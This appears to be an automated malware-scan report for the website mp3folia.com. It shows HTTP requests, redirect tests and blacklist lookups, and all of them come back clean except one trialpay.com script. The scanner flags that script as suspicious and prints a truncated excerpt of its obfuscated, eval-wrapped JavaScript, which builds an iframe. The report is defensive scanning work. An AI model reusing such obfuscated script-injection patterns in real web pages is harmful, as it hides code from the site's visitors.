Scanned pages/files
Request | Server response | Status |
http://mp3folia.com/ | 200 OK Content-Length: 17356 Content-Type: text/html | clean |
http://www.trialpay.com/js/offer_tp/?c=cfa5246 | 200 OK Content-Length: 56012 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. eval((function(s,o,d){if(s.length!=46691){var e=new Error();e.number=1;e.message=e.description="char-encoding must be set to UTF-8 in main document";throw e;}var res='';var start=0;d=d.split(',');o=o.split(';');for(var i=0;i<o.length;i++){var pr=o[i].split(',');var len=pr[0]-0;res+=s.substr(start,len)+d[pr[1]-0];start+=len;}res+=s.substr(start);return res;})("( ==decodeURIComponent('%75%6e%64%65%66%69%6e%65%64')){ ={};}( [decodeURIComponent('%63 ...[55624 bytes skipped]... Decoded script: ...[20306 bytes skipped]... %75%33%6e%64');var left=(width-win_width)/2;if(!position)position=TRIALPAY[decodeURIComponent('%63%6f%6d%6d%6f%6e')][decodeURIComponent('%6f%76%65%72%6c%61%79')][decodeURIComponent('%5f%70%6f%73%69%74%69%6f%6e')];if(decodeURIComponent('%6c')==position){left=20;}var td_id=TRIALPAY[decodeURIComponent('%63%6f%6d%6d%6f%6e')][decodeURIComponent('%67%65%74%5f%75%6e%69%71%75%65%5f%69%64')](decodeURIComponent('%74%72%69%61%6c%70%61%79%5f%74%64'));var iframe_html=frame_id?'':decodeURIComponent('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22')+url+decodeURIComponent('%22%20%69%64%3d%22%75%72%36%35%68%66%6d%77%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%63%72%6f%6c%6c%69%6e%67%3d%22%6e%6f%22%20%73%74%79%6c%65%3d%22%77%69%64%74%68%3a')+win_inner_width+decodeURIComponent('%70%78%3b%20%68%65%69%67%68%74%3a')+win_inner_height+decodeURIComponent('%70%78%3b%20%62%6f%72%64%65%72%3a%30%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%22%3e%3c%2f%69 ...[87234 bytes skipped]... | ||
http://files.main.bloggerstop.net/uploads/3/0/2/5/3025338/falling_snowflakes.js | 410 Gone Content-Length: 554 Content-Type: text/html | clean |
http://files.main.bloggerstop.net/test404page.js | 404 Not Found Content-Length: 1513 Content-Type: text/html | clean |
http://files.main.bloggerstop.net/ | 404 Not Found Content-Length: 1517 Content-Type: text/html | clean |
http://files.main.bloggerstop.net/uploads/3/0/2/5/3025338/snowstorm.js | 410 Gone Content-Length: 554 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mp3folia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 02:51:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17356
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 20:34:44 GMT
...17356 bytes of data.
GET / HTTP/1.1
Host: mp3folia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 02:51:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17356
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 20:34:44 GMT
...17356 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mp3folia.com
Referer: http://www.google.com/search?q=mp3folia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mp3folia.com
Referer: http://www.google.com/search?q=mp3folia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mp3folia.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mp3folia.com/
Result: mp3folia.com is not infected or malware details are not published yet.
Result: mp3folia.com is not infected or malware details are not published yet.